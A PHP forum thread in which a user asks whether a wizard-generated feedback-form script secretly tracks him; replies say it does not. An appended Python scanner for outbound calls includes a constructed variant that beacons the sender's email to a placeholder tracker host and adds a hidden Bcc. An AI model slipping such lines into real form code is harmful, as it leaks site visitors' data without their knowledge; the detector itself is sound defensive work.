


Feedback Form: Security Issue
Junior Member

Joined: Thu Nov 19, 2009 10:51 pm
Posts: 2
Feedback Form: Security Issue
I spent a good deal of time yesterday searching online for a suitable feedback form for a site I am creating for my sister-in-law. I finally found one that seemed to suit my needs at:
http://www.sigmanetz.com/web-form-wizard.html

Everything here seemed above board and it took very little time to generate the necessary code in the site’s wizard.
I followed the accompanying instructions to create feedback.php as well as adding the HTML form code into a web page named feedback.html. I pasted the following JavaScript into the head of this page as directed:

<script type="text/javascript">
// Returns true for an address shaped like user@host.tld. The wizard's version
// only returned false on a mismatch (undefined otherwise) and left the dot
// before the TLD unescaped, so it matched any character there.
function isValidEmail(e) {
    var p = /^[^@]+@[^@]+\.[a-z]{2,}$/i;
    return e.search(p) != -1;
}

// Called from the form's onsubmit; returning false stops the submission.
function val()
{
    if(document.form.name.value == "")
    {
        alert("Please enter your name.");
        document.form.name.focus();
        return false;
    }
    if(document.form.email.value == "")
    {
        alert("Please enter an E-mail Address.");
        document.form.email.focus();
        return false;
    }
    if(!isValidEmail(document.form.email.value))
    {
        alert("Please enter a valid E-mail Address.");
        document.form.email.focus();
        return false;
    }
    if(document.form.comments.value == "")
    {
        alert("Please enter your comments.");
        document.form.comments.focus();
        return false;
    }
    return true;
}
</script>

I also created a page named okay.html as directed and then uploaded both web pages and the feedback.php script to tradescards.org to test them out online.
This is the code the wizard generated for me for feedback.php:
<?php
// The sender address goes straight into a mail header, so reject anything
// that is not a single well-formed address: a raw $_POST value can carry
// CR/LF and inject additional headers (e.g. extra recipients).
$from = filter_var(trim($_POST['email']), FILTER_VALIDATE_EMAIL);
if ($from === false) {
    echo "<script>alert('Please enter a valid E-mail Address.');location.href='http://www.tradescards.org/feedback.html';</script>";
    exit;
}
$to="eamonn.henry@topmail.ie";
$subject = "Feedback Form Comments";

$eol="\r\n";
// Common Headers
$headers = 'MIME-Version: 1.0' . $eol;
$headers .= 'Content-type: text/html; charset=iso-8859-1' . $eol;
$headers .= 'From: '.$from.$eol;

// The body is sent as text/html, so escape the user-supplied fields
// before interpolating them.
$name=htmlspecialchars(trim($_POST['name']), ENT_QUOTES, 'ISO-8859-1');
$email=$from;
$comments=htmlspecialchars(trim($_POST['comments']), ENT_QUOTES, 'ISO-8859-1');
$body="

<strong>Name: </strong>$name

<strong>E-mail: </strong>$email

<strong>Comments: </strong>$comments

";
if(mail($to, $subject, $body, $headers)){
    echo "<script>alert('Your comments have been received. Thank you.');location.href='http://www.tradescards.org/okay.html';</script>";
}
else{
    echo "<script>alert('ERROR: Failed to receive comments, please try again.');location.href='http://www.tradescards.org/feedback.html';</script>";
}
?>

I was in a bit of a hurry and, when checking through the generated code, I somehow changed the URL of the feedback form at the end of this script from feedback.html to feedback.php.
Obviously, when I tried the feedback form online it did not work, so I gave up in frustration; this was one more in a line of flops.
However, I got quite a surprise when I went to the email account I had chosen for feedback replies.
I found quite a courteous message awaiting me from one of the folks at sigmanetz.com, addressed to the owner of the site, my sister-in-law (Phil Henry), that said:

“It has come to our attention that you have recently attempted to create
a feedback form with Sigmanetz Tutorials. We would just like to inform
you, that, from the information we have received, that you did not
successfully create the feedback form. This is because you have entered
http://www.tradescards.org/feedback.php as the URL for the feedback
form, instead of using http://www.tradescards.org/feedback.html”


The email went on to suggest that a return to the wizard to regenerate a corrected script would be a good idea and offered any additional help that might be needed.

From the time stamp on the email, I would estimate that it was sent less than 30 minutes after I had made the failed attempt to test the form. So in order to check out other pages on the site to find the owner’s name and to compose the email, Sigmanetz must have been alerted as soon as I hit the “submit” button.

I am very concerned about this.
I see nothing in the generated code to indicate that they were tracking my activities, so how were they aware that I had used their code at all? If I had managed at the first attempt to get the form to work and then gone on to publish the site with their form and related pages, would there possibly be a danger of confidential information being monitored?
I realise that this post is quite lengthy and I apologise for this but I thought it best to publish the relevant code sections in the hope that somebody here might be able to explain what is happening here.


Fri Nov 20, 2009 12:22 am
Junior Member

Joined: Thu Nov 19, 2009 10:51 pm
Posts: 2
Xnuiem wrote:
Nothing in there that looks like it sent anything. More than likely it happened when you used the wizard on their site.

Thanks for your help, Xnuiem. I had been so surprised when I found my form was being tracked that I completely overlooked the obvious.


Sun Nov 22, 2009 5:56 am
Junior Member

Joined: Fri Nov 27, 2009 8:56 am
Posts: 1
Mostly Harmless...
There is absolutely nothing in the code that indicates that any sort of tracking is taking place. What they probably did is simply keep a copy of your E-mail and URL once you pressed the submit button, to see who was using their service. What seems to have happened is that they were genuinely trying to help you. Other than that, it all seems mostly harmless ;-)


Fri Nov 27, 2009 9:02 am
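The question the thread turns on is whether the generated feedback.php sends anything to a third party. As an added example that is not from this thread or from sigmanetz.com, the following static scan looks for the PHP/JS constructs that could do that (HTTP clients, remote includes, Bcc/Cc headers, remote script/image references, URLs to hosts other than your own) and runs over a constructed abridgement of the posted script and over a constructed variant that does phone home. All `.invalid` hostnames and addresses are placeholders.

```python
import re

# Generic PHP/JS constructs that can move form data off the host or pull in a
# remote resource. These are standard API names, not anything from the thread.
OUTBOUND_PATTERNS = {
    "php_socket_or_curl": r"\b(curl_init|curl_exec|fsockopen|stream_socket_client)\s*\(",
    "php_remote_fetch": r"\b(file_get_contents|fopen|include|require)\s*\(\s*['\"]https?://",
    "hidden_copy_header": r"\b(Bcc|Cc)\s*:",
    "js_network_call": r"\b(XMLHttpRequest|fetch|navigator\.sendBeacon)\b",
    "remote_resource": r"<(?:img|script|iframe)[^>]+src\s*=\s*['\"]https?://",
}
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

def scan(source, own_hosts):
    """Return (kind, line_no, evidence) for each suspicious construct; a URL
    whose host is not one of own_hosts is reported as 'foreign_host'."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for kind, pat in OUTBOUND_PATTERNS.items():
            if re.search(pat, line):
                findings.append((kind, no, line.strip()))
        for host in URL_HOST.findall(line):
            if host.lower() not in own_hosts:
                findings.append(("foreign_host", no, host))
    return findings

# Constructed abridgement of the posted feedback.php (same constructs, placeholder address).
GENERATED_PHP = '''<?php
$from=trim($_POST['email']);
$to="owner@example.invalid";
$headers = 'MIME-Version: 1.0' . "\\r\\n";
$headers .= 'From: '.$from."\\r\\n";
$body="<strong>Comments: </strong>".trim($_POST['comments']);
if(mail($to, "Feedback", $body, $headers)){
echo "<script>location.href='http://www.tradescards.org/okay.html';</script>";
}
?>'''

# Constructed variant of the kind the OP feared: a blind copy plus an HTTP beacon.
PHONING_HOME_PHP = GENERATED_PHP.replace(
    "$headers .= 'From: '",
    "$headers .= \"Bcc: collector@example.invalid\\r\\n\";\n"
    "file_get_contents(\"http://tracker.example.invalid/ping?u=\" . $from);\n"
    "$headers .= 'From: '")

if __name__ == "__main__":
    for label, src in (("wizard output", GENERATED_PHP), ("phoning-home variant", PHONING_HOME_PHP)):
        hits = scan(src, ("www.tradescards.org",))
        print(label, "->", hits or "clean")
```

A clean result for the wizard output means the data that reached sigmanetz.com went out when the wizard form itself was submitted, not from the generated script.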
© Copyright 2003-2008 www.php-editors.com. The ultimate PHP Editor and PHP IDE site.